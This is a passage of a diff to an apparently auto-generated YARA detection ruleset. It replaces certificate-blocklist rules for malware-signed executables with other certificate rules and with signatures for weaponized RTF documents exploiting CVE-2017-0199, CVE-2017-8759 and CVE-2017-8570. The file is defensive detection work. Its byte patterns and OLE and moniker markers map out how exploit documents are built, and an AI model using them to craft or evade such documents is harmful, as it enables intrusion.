 		author = "ditekSHen"
-		id = "fb9446b5-2d49-51de-bedb-ea541d415ae2"
+		id = "108dd1b8-110a-5680-bd96-5517392300fa"
 		date = "2024-10-04"
 		modified = "2024-10-04"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2131-L2142"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8911-L8924"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "858a98ba8fd3244b2c0f6d3dd89a294b0187dd1a82cdcca67c162985d80ca6ed"
+		logic_hash = "3db3a4f424d2974b746b8290a461f777eb88e0d8c6048e6e51e561c1f91b7747"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "b1c1dc94f0c775deeb46a0a019597c4ac27ab2810e3b3241bdc284d2fccf3eb5"
+		thumbprint = "7d6dc731d94c9aaf241f3df940ce8ca8393380b12f92e872273ae747c5d4791f"
+		reason = "IcedID"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ELEKSIR, OOO" and pe.signatures [ i ] . serial == "09:17:36:d3:68:a5:98:0e:be:b4:33:a0:ec:b4:9f:bb" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Venezia Design SRL" and pe.signatures [ i ] . serial == "04:06:c4:a1:52:1a:38:c8:d0:c4:aa:21:43:88:e4:dc" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_00E48Cb3314977D77Dedcd4C77Dd144C50 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_5Ef27Fc51Ee80B30430947C9967Db440 : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "9b708e1b-a878-5244-8fe2-3061f058a9ab"
+		id = "53f7b334-8feb-5581-a64c-5db6558a6434"
 		date = "2024-10-04"
 		modified = "2024-10-04"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2144-L2155"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8926-L8939"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "a2ca0ce3812be5e46cb0bc9c73fc4f31294c8d594ca821ad924a3f06cf2430ca"
+		logic_hash = "e282054102d852c0f66435148ce97050b15fb6f60f5d1bfc875b02de9c50c297"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "025bce0f36ec5bac08853966270ed2f5e28765d9c398044462a28c67d74d71e1"
+		thumbprint = "c2dcc4a1ea16e45f86828e81eda20f83e70cbf77e152ddd80b1b4a730ef77551"
+		reason = "RedLineStealer"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BESPOKE SOFTWARE SOLUTIONS LIMITED" and pe.signatures [ i ] . serial == "00:e4:8c:b3:31:49:77:d7:7d:ed:cd:4c:77:dd:14:4c:50" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "AMCERT,LLC" and pe.signatures [ i ] . serial == "5e:f2:7f:c5:1e:e8:0b:30:43:09:47:c9:96:7d:b4:40" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_1E72A72351Aecf884Df9Cdb77A16Fd84 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_672237253A9B7Ef9D02D7D1Cb27A3Ff4 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "No description has been set in the source file - DitekSHen"
 		author = "ditekSHen"
-		id = "7972befe-3a88-5ea5-a865-3d008b712bc9"
+		id = "590b3764-c4e2-59a5-b263-bc3e0d57c85a"
 		date = "2024-10-04"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2157-L2168"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8941-L8952"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "6555b89f1643f2e461a936df402dcbe8dd5100a1def76c7c6d8f792d1c0ed006"
+		logic_hash = "9b989f8d89c566980f3f7e6490f0271ab0f531fb2717b55e6f3b7ff6fadd9144"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "f945bbea1c2e2dd4ed17f5a98ea7c0f0add6bfc3d07353727b40ce48a7d5e48f"
+		thumbprint = "36a0f423c1fa48f172e4fecd06b8099f0ebbaeb8"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Buket and Co." and pe.signatures [ i ] . serial == "1e:72:a7:23:51:ae:cf:88:4d:f9:cd:b7:7a:16:fd:84" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Foshan Yongqiheng Trading Co., Ltd." and pe.signatures [ i ] . issuer contains "Certum Extended Validation Code Signing 2021 CA" and pe.signatures [ i ] . serial == "67:22:37:25:3a:9b:7e:f9:d0:2d:7d:1c:b2:7a:3f:f4" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_00B383658885E271129A43D19De40C1Fc6 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_708737C791C878D6Dd7B7C43 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "No description has been set in the source file - DitekSHen"
 		author = "ditekSHen"
-		id = "47389dc4-8092-5e12-91a1-f370c9c507a9"
+		id = "65f3827d-25c4-59bb-8555-508c3e92ed5d"
 		date = "2024-10-04"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2170-L2181"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8954-L8965"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "9312bc8f1005d71393ab63f05bdabff52752ad939dd4311485dc4b56f75eece9"
+		logic_hash = "5e47fc7ed52e57aafc5eb2f1d56eb8296080218b65d70879bd75fd1a0ac58f66"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "ef234051b4b83086b675ff58aca85678544c14da39dbdf4d4fa9d5f16e654e2f"
+		thumbprint = "7ed7081ee612fbf9fe0ade46f4a2749da20251e0"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Elekon" and pe.signatures [ i ] . serial == "00:b3:83:65:88:85:e2:71:12:9a:43:d1:9d:e4:0c:1f:c6" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Langfang Alkem Material Technology Co., Ltd." and pe.signatures [ i ] . issuer contains "GlobalSign GCC R45 EV CodeSigning CA 2020" and pe.signatures [ i ] . serial == "70:87:37:c7:91:c8:78:d6:dd:7b:7c:43" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_00Ca7D54577243934F665Fd1D443855A3D : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_0Bc777F88Ddf5F3Ce479452F : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "No description has been set in the source file - DitekSHen"
 		author = "ditekSHen"
-		id = "8519119d-a37b-5438-a642-48e1d40024b8"
+		id = "da891fe8-fe9f-53f8-836c-161d13fd5382"
 		date = "2024-10-04"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2183-L2194"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8967-L8978"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "867844464609a043902f07aad3fa568b482259655bc181d992bd409437165790"
+		logic_hash = "988fd5e652910f7b4388fe5bed91195261ff95d84cc7e53a389432577a114baa"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "2ea2c7625c1a42fff63f0b17cfc4fd0c0f76d7eb45a86b18ec9a630d3d8ad913"
+		thumbprint = "55aa40dea5621f0c0fbc8b9dd8066ff2290a7e82"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "FABO SP Z O O" and pe.signatures [ i ] . serial == "00:ca:7d:54:57:72:43:93:4f:66:5f:d1:d4:43:85:5a:3d" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ARION LLC" and pe.signatures [ i ] . issuer contains "GlobalSign GCC R45 EV CodeSigning CA 2020" and pe.signatures [ i ] . serial == "0b:c7:77:f8:8d:df:5f:3c:e4:79:45:2f" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_7709D2Df39E9A4F7Db2F3Cbc29B49743 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_691Ed2236Cca78D180F29Dfd : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "No description has been set in the source file - DitekSHen"
 		author = "ditekSHen"
-		id = "55e8815f-0885-5eb0-bf85-05bbd874a821"
+		id = "f889f1a6-070d-505e-aaa6-0d454f52a876"
 		date = "2024-10-04"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2196-L2207"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8980-L8991"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "b63fa6e4e92549ae92b9a414390471c49fd50010bb7e10e1db72ff53370a6354"
+		logic_hash = "94e7c3aea1fca253395eae398176dc9875ca1f1c13002063b5eda8ffb4ad973f"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "04349ba0f4d74f46387cee8a13ee72ab875032b4396d6903a6e9e7f047426de8"
+		thumbprint = "8c8a043f51bb8d59182fb268c0db2f1b9d876dbe"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Grina LLC" and pe.signatures [ i ] . serial == "77:09:d2:df:39:e9:a4:f7:db:2f:3c:bc:29:b4:97:43" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "COSMART LLC" and pe.signatures [ i ] . issuer contains "GlobalSign GCC R45 EV CodeSigning CA 2020" and pe.signatures [ i ] . serial == "69:1e:d2:23:6c:ca:78:d1:80:f2:9d:fd" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_186D49Fac34Ce99775B8E7Ffbf50679D : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_3B0E3879266F3Bc98225B390 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "No description has been set in the source file - DitekSHen"
 		author = "ditekSHen"
-		id = "eeea3085-9fd7-5077-8c13-e0c4438b2e79"
+		id = "0b85d4be-678a-51a1-acbc-3e7b94bec804"
 		date = "2024-10-04"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2209-L2220"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8993-L9004"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "950b14787e707be843d1443a612c372ceb0c2830de20bce1f62317fa39149e5b"
+		logic_hash = "2d480534c046e38fe90ee01dc0fa9abf1ade15f879c3770f3df54c6e2c2e1552"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "812a80556775d658450362e1b3650872b91deba44fef28f17c9364add5aa398e"
+		thumbprint = "2eab64a4eaf37060d27620a822df2e1f18ac28f6"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Hairis LLC" and pe.signatures [ i ] . serial == "18:6d:49:fa:c3:4c:e9:97:75:b8:e7:ff:bf:50:67:9d" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Hangzhou Yueju Apparel Co., Ltd." and pe.signatures [ i ] . issuer contains "GlobalSign GCC R45 EV CodeSigning CA 2020" and pe.signatures [ i ] . serial == "3b:0e:38:79:26:6f:3b:c9:82:25:b3:90" )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_0097Df46Acb26B7C81A13Cc467B47688C8 : FILE
+rule DITEKSHEN_INDICATOR_RTF_EXPLOIT_CVE_2017_0199_1 : CVE_2017_0199 FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects RTF documents potentially exploiting CVE-2017-0199"
 		author = "ditekSHen"
-		id = "1c281766-abd4-534b-9442-233369e1f55e"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "74b3702a-7b4d-58be-ad2c-c2b1cf0ebc50"
+		date = "2024-09-06"
+		modified = "2024-09-06"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2222-L2233"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_office.yar#L1-L69"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "ab4da0ddd001acf9f8d78c4beb28c648f8516088561e3140739b4b41d93b58ef"
+		logic_hash = "06b75267f00b775a6c1cd7a2022a9cfa0ea2c976f969c2c066be51449f197f58"
 		score = 75
 		quality = 75
-		tags = "FILE"
-		thumbprint = "54c4929195fafddfd333871471a015fa68092f44e2f262f2bbf4ee980b41b809"
-		importance = 20
+		tags = "CVE-2017-0199, FILE"
+
+	strings:
+		$urlmoniker3 = { 45 0a 30 0a 43 0a 39 0a 45 0a 41 0a 37 0a 39 0a
+                         46 0a 39 0a 42 0a 41 0a 43 0a 45 0a 31 0a 31 0a
+                         38 0a 43 0a 38 0a 32 0a 30 0a 30 0a 41 0a 41 0a
+                         30 0a 30 0a 34 0a 42 0a 41 0a 39 0a 30 0a 42 }
+		$urlmoniker4 = { 45 0d 0a 30 0d 0a 43 0d 0a 39 0d 0a 45 0d 0a 41
+                         0d 0a 37 0d 0a 39 0d 0a 46 0d 0a 39 0d 0a 42 0d
+                         0a 41 0d 0a 43 0d 0a 45 0d 0a 31 0d 0a 31 0d 0a
+                         38 0d 0a 43 0d 0a 38 0d 0a 32 0d 0a 30 0d 0a 30
+                         0d 0a 41 0d 0a 41 0d 0a 30 0d 0a 30 0d 0a 34 0d
+                         0a 42 0d 0a 41 0d 0a 39 0d 0a 30 0d 0a 42 }
+		$urlmoniker6 = { 65 0a 30 0a 63 0a 39 0a 65 0a 61 0a 37 0a 39 0a
+                         66 0a 39 0a 62 0a 61 0a 63 0a 65 0a 31 0a 31 0a
+                         38 0a 63 0a 38 0a 32 0a 30 0a 30 0a 61 0a 61 0a
+                         30 0a 30 0a 34 0a 62 0a 61 0a 39 0a 30 0a 62 }
+		$urlmoniker7 = { 65 0d 0a 30 0d 0a 63 0d 0a 39 0d 0a 65 0d 0a 61
+                         0d 0a 37 0d 0a 39 0d 0a 66 0d 0a 39 0d 0a 62 0d
+                         0a 61 0d 0a 63 0d 0a 65 0d 0a 31 0d 0a 31 0d 0a
+                         38 0d 0a 63 0d 0a 38 0d 0a 32 0d 0a 30 0d 0a 30
+                         0d 0a 61 0d 0a 61 0d 0a 30 0d 0a 30 0d 0a 34 0d
+                         0a 62 0d 0a 61 0d 0a 39 0d 0a 30 0d 0a 62 }
+		$ole1 = { d0 cf 11 e0 a1 b1 1a e1 }
+		$ole2 = "d0cf11e0a1b11ae1" ascii nocase
+		$ole3 = "64306366313165306131623131616531" ascii
+		$ole4 = "640a300a630a660a310a310a650a300a610a310a620a310a310a610a650a31" ascii nocase
+		$ole5 = { 64 0a 30 0a 63 0a 66 0a 31 0a 31 0a 65 0a 30 }
+		$ole6 = { 64 0d 0a 30 0d 0a 63 0d 0a 66 0d 0a 31 0d 0a 31 0d 0a 65 0d 0a 30 }
+		$obj1 = "\\objhtml" ascii
+		$obj2 = "\\objdata" ascii
+		$obj3 = "\\objupdate" ascii
+		$obj4 = "\\objemb" ascii
+		$obj5 = "\\objautlink" ascii
+		$obj6 = "\\objlink" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Information Civilized System Oy" and pe.signatures [ i ] . serial == "00:97:df:46:ac:b2:6b:7c:81:a1:3c:c4:67:b4:76:88:c8" )
+		uint32( 0 ) == 0x74725c7b and 1 of ( $urlmoniker* ) and 1 of ( $ole* ) and 1 of ( $obj* )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_2A52Acb34Bd075Ac9F58771D2A4Bbfba : FILE
+rule DITEKSHEN_INDICATOR_RTF_EXPLOIT_CVE_2017_8759_1 : CVE_2017_8759 FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "detects CVE-2017-8759 weaponized RTF documents."
 		author = "ditekSHen"
-		id = "2d6b6ff5-e081-5e91-b03f-6e0d02afdb8f"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "8f873145-b909-5185-9f85-07c820d1f38e"
+		date = "2024-09-06"
+		modified = "2024-09-06"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2235-L2246"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_office.yar#L215-L238"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "9ffad34a94e9210bb98021c0ee0ddba4144406cca976537efe24e63367a295cd"
+		logic_hash = "595dc0153a2349fbd4f92dd544a3dfd05715059dd639653e7c7e6ac80624360e"
 		score = 75
 		quality = 75
-		tags = "FILE"
-		thumbprint = "c839065a159bec7e63bfdcb1794889829853c07f7a931666f4eb84103302c1c9"
-		importance = 20
+		tags = "CVE-2017-8759, FILE"
+
+	strings:
+		$clsid1 = { 00 03 00 00 00 00 00 00 c0 00 00 00 00 00 00 46 }
+		$clsid2 = { 00 03 00 00 00 00 00 00 C0 00 00 00 00 00 00 46 }
+		$clsid3 = "0003000000000000c000000000000046" ascii nocase
+		$clsid4 = "4f4c45324c696e6b" ascii nocase
+		$clsid5 = "OLE2Link" ascii nocase
+		$ole1 = { d0 cf 11 e0 a1 b1 1a e1 }
+		$ole2 = "d0cf11e0a1b11ae1" ascii nocase
+		$ole3 = "64306366313165306131623131616531" ascii
+		$ole4 = "640a300a630a660a310a310a650a300a610a310a620a310a310a610a650a31"
+		$s1 = "wsdl=http" wide
+		$s2 = "METAFILEPICT" ascii
+		$s3 = "INCLUDEPICTURE \"http" ascii
+		$s4 = "!This program cannot be run in DOS mode" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Katarzyna Galganek mim e coc" and pe.signatures [ i ] . serial == "2a:52:ac:b3:4b:d0:75:ac:9f:58:77:1d:2a:4b:bf:ba" )
+		uint32( 0 ) == 0x74725c7b and 1 of ( $clsid* ) and 1 of ( $ole* ) and 2 of ( $s* )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_5A9D897077A22Afe7Ad4C4A01Df6C418 : FILE
+rule DITEKSHEN_INDICATOR_RTF_EXPLOIT_CVE_2017_8759_2 : CVE_2017_8759 FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "detects CVE-2017-8759 weaponized RTF documents."
 		author = "ditekSHen"
-		id = "e44fcc54-9d0c-5b9b-a34a-03f31ae5333d"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "92c8f45e-3792-51b3-bda4-7e9eae0e9a80"
+		date = "2024-09-06"
+		modified = "2024-09-06"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2248-L2259"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_office.yar#L240-L268"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "f82b59f5d1996ae37b0cb7f7a799e2fcc7d9da0ffddfe63cbbb84b6f0e7e7b23"
+		logic_hash = "15c9a5cfce5d1a797bab049352d8506b8bc112cabe2f510019f5d203690419e8"
 		score = 75
 		quality = 75
-		tags = "FILE"
-		thumbprint = "50fa9d22557354a078767cb61f93de9abe491e3a8cb69c280796c7c20eabd5b9"
-		importance = 20
+		tags = "CVE-2017-8759, FILE"
+
+	strings:
+		$clsid1 = { 88 d9 6a 0c f1 92 11 d4 a6 5f 00 40 96 32 51 e5 }
+		$clsid2 = "88d96a0cf19211d4a65f0040963251e5" ascii nocase
+		$clsid3 = "4d73786d6c322e534158584d4c5265616465722e" ascii nocase
+		$clsid4 = "Msxml2.SAXXMLReader." ascii nocase
+		$ole1 = { d0 cf 11 e0 a1 b1 1a e1 }
+		$ole2 = "d0cf11e0a1b11ae1" ascii nocase
+		$ole3 = "64306366313165306131623131616531" ascii
+		$ole4 = "640a300a630a660a310a310a650a300a610a310a620a310a310a610a650a31"
+		$obj1 = "\\objhtml" ascii
+		$obj2 = "\\objdata" ascii
+		$obj3 = "\\objupdate" ascii
+		$obj4 = "\\objemb" ascii
+		$obj5 = "\\objautlink" ascii
+		$obj6 = "\\objlink" ascii
+		$obj7 = "\\objclass htmlfile" ascii
+		$soap1 = "c7b0abec197fd211978e0000f8757e" ascii nocase
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Klarens LLC" and pe.signatures [ i ] . serial == "5a:9d:89:70:77:a2:2a:fe:7a:d4:c4:a0:1d:f6:c4:18" )
+		uint32( 0 ) == 0x74725c7b and 1 of ( $clsid* ) and 1 of ( $ole* ) and ( 2 of ( $obj* ) or 1 of ( $soap* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_00D7C432E8D4Edef515Bfb9D1C214Ff0F5 : FILE
+rule DITEKSHEN_INDICATOR_RTF_Exploit_Scripting : CVE_2017_8759 CVE_2017_8570 FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "detects CVE-2017-8759 or CVE-2017-8570 weaponized RTF documents."
 		author = "ditekSHen"
-		id = "fc3fd388-91f6-5f53-a284-4ef0a7d22290"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "e8fd1231-3ef5-5b0b-987c-f55337804da3"
+		date = "2024-09-06"
+		modified = "2024-09-06"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2261-L2272"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_office.yar#L270-L302"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "9ef64774a0b6b11820321cd36d49213ad245cea82960aab99bb18e44a2ee79a8"
+		logic_hash = "a1f4c833f0132dcbe2b3677d6ac0f3597c152702515375d60d4332c21183bd76"
 		score = 75
 		quality = 75
-		tags = "FILE"
-		thumbprint = "6256d3ca79330f7bd912a88e59f9a4f3bdebdcd6b9c55cda4e733e26583b3d61"
-		importance = 20
+		tags = "CVE-2017-8759, CVE-2017-8570, FILE"
+
+	strings:
+		$clsid1 = { 00 03 00 00 00 00 00 00 c0 00 00 00 00 00 00 46 }
+		$clsid2 = "0003000000000000c000000000000046" ascii nocase
+		$clsid3 = "4f4c45324c696e6b" ascii nocase
+		$clsid4 = "OLE2Link" ascii nocase
+		$ole1 = { d0 cf 11 e0 a1 b1 1a e1 }
+		$ole2 = "d0cf11e0a1b11ae1" ascii nocase
+		$ole3 = "64306366313165306131623131616531" ascii
+		$ole4 = "640a300a630a660a310a310a650a300a610a310a620a310a310a610a650a31"
+		$ole5 = { 64 30 63 66 [0-2] 31 31 65 30 61 31 62 31 31 61 65 31 }
+		$ole6 = "D0cf11E" ascii nocase
+		$obj1 = "\\objhtml" ascii
+		$obj2 = "\\objdata" ascii
+		$obj3 = "\\objupdate" ascii
+		$obj4 = "\\objemb" ascii
+		$obj5 = "\\objautlink" ascii
+		$obj6 = "\\objlink" ascii
+		$obj7 = "\\mmath" ascii
+		$obj8 = "\\objclass htmlfile" ascii
+		$sct1 = { 33 (43|63) (3533|3733) (3433|3633) (3532|3732) (3439|3639)( 3530|3730) (3534|3734) (3443|3643) (3435|3635) (3534|3734) }
+		$sct2 = { (3737|3537) (3733|3533) (3633|3433) (3732|3532) (3639|3439) (3730|3530) (3734|3534) (3245|3265) (3733|3533) (3638|3438) (3635|3435) (3643|3443) (3643|3443) }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "LLC \"MILKY PUT\"" and pe.signatures [ i ] . serial == "00:d7:c4:32:e8:d4:ed:ef:51:5b:fb:9d:1c:21:4f:f0:f5" )
+		uint32( 0 ) == 0x74725c7b and 1 of ( $clsid* ) and 1 of ( $ole* ) and 1 of ( $obj* ) and 1 of ( $sct* )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_0085E1Af2Be0F380E5A5D11513Ddf45Fc6 : FILE
+rule DITEKSHEN_INDICATOR_RTF_Embedded_Excel_Sheetmacroenabled : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects RTF documents embedding an Excel sheet with macros enabled. Observed in exploit followed by dropper behavior"
 		author = "ditekSHen"
-		id = "d55fd5ca-0e20-51de-84b6-f30dd2660529"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "342d10b3-61d2-5fcb-8f4f-1fe45049257b"
+		date = "2024-09-06"
+		modified = "2024-09-06"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2274-L2285"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_office.yar#L304-L328"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "5a86b9aecf7697bd8e1f40407934c6a9941714404a931b0f1bed4ae7440f6921"
+		logic_hash = "cc3b52e549c2697c6e0a2fea365d193311d90d26854bd2fe321aa26c118975a0"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "e9849101535b47ff2a67e4897113c06f024d33f575baa5b426352f15116b98b4"
-		importance = 20
+
+	strings:
+		$ex1 = "457863656c2e53686565744d6163726f456e61626c65642e" ascii nocase
+		$ex2 = "0002083200000000c000000000000046" ascii nocase
+		$ex3 = "Excel.SheetMacroEnabled." ascii
+		$ole1 = { d0 cf 11 e0 a1 b1 1a e1 }
